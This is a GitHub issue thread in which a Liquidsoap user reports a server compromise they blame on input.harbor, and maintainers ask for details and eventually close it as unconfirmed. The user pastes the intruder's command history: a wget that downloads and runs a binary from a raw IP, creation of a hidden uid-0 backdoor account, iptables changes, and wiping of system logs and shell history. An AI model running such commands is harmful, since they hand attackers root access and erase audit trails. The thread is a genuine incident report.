Potential security issue with input.harbor

[maurodelazeri]

Guys,
I'm using the liquidsoap for some time, I have enabled the "input.harbor" in my script, it is a dynamic script that always generates User and password dynamically.
I saw that when enabled "input.harbor" my machine is invaded and runs on my machine the following commands bellow, I formatted 3 times the machine and I did several tests and yes, the security hole that allows access to my machine is when the "input.harbor" is enabled.
Basically what I noticed is that the invader installs a SYS flood in my machine, nothing more than that, but this is very serious.

Please who have "input.harbor" enabled can verify that? Check the user "webll" in your /etc/passwd

**ip where does the connection comes from 104.239.228.251
**
Commands run on my machine at all access 
ps -ef
    2  cd /bin
    3  wget http://58.64.207.219:888/sshh
    4  chmod 0755 sshh
    5  ./sshh
    6  useradd -o -u 0 -g 0 -M -d /root -s /bin/bash webll
    7  passwd webll
    8  iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
    9  iptables -D INPUT -p tcp --dport 6379 -j DROP
   10  echo>ar/log/syslog
   11  echo>ar/log/messages
   12  echo>ar/logtpd/access_log
   13  echo>ar/logtpd/error_log0
   14  echo>ar/log/xferlog
   15  echo>ar/logcure
   16  echo>ar/log/auth.log
   17  echo>ar/log/user.log
   18  echo>ar/log/wtmp
   19  echo>ar/log/lastlog
   20  echo>ar/log/btmp
   21  echo>ar/run/utmp
   22  echo >/root/.bash_history
   23  history-c

live = input.harbor(
            id = "#{mount_name}",
            on_connect = live_start,
            on_disconnect = live_stop,
            buffer=8.,
            max=20.,
            icy = true,
            port = int_of_string(port2), Dynamic port 
            user = "#{mount_name}", Dynamic mount point
            password = "#{streamingPasswordHarbor}", Dynamic Password
            "#{mount_name}")

root@liquidsoap:/home/ubuntu/live# **uname -a**

Linux liquidsoap 3.13.0-74-generic #118-Ubuntu SMP Thu Dec 17 22:52:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

root@liquidsoap:/home/ubuntu/live#** liquidsoap --version**

Liquidsoap 1.2.0+scm (git://github.com/savonet/liquidsoap.git@5828d260cbaafb13952f0b65b7abd9867ea72308:20160202:091347)

Copyright (c) 2003-2016 Savonet team

Liquidsoap is open-source software, released under GNU General Public License.

See <http://liquidsoap.fm> for more information.

[toots]

Hi @maurodelazeri

Let's take that privately. Would you mind sending more info at security@liquidsoap.fm ? In particular, how did you get those commands? Through the logs? If so then could you send us the logs at the above email address?

Thanks!

[smimram]

Also, do you run Liquidsoap as root? Do you have any other services running on the server? Is there any other interaction in Liquidsoap (or other programs)? How do you know for sure it is input.harbor?

[maurodelazeri]

I just send an email to security@liquidsoap.fm
check it out

[maurodelazeri]

Just to update it,
Telnet is something that should be used carefully, I increased the number of characters for a password and the most important change I restrict the permissions of the User that uses liquidsoap.
I have saw it for a week and it did not happen more, anyway I believe that future improvements can be made to use harbor input.

[S54B32]

Was this security issue confirmed? Is there any news on this at all?

I'm sure you're aware but a potential security measure is to use IPTables or similar to restrict access to the harbor port to certain IPs or ranges of IPs.

[toots]

I was never able to reproduce or find any conclusive evidence of a security
issue in liquidsoap's code. The stack running the compromised machine was
quite complex, using node up front and running as root..

2016-03-15 4:53 GMT-05:00 S54B32 notifications@github.com:

Was this security issue confirmed? Is there any news on this at all?

I'm sure you're aware but a potential security measure is to use IPTables
or similar to restrict access to the harbor port to certain IPs or ranges
of IPs.

—
You are receiving this because you commented.
Reply to this email directly or view it on GitHub:
#17 (comment)

[toots]

I'm closing this one. Please re-open or fill a new issue if/when needed.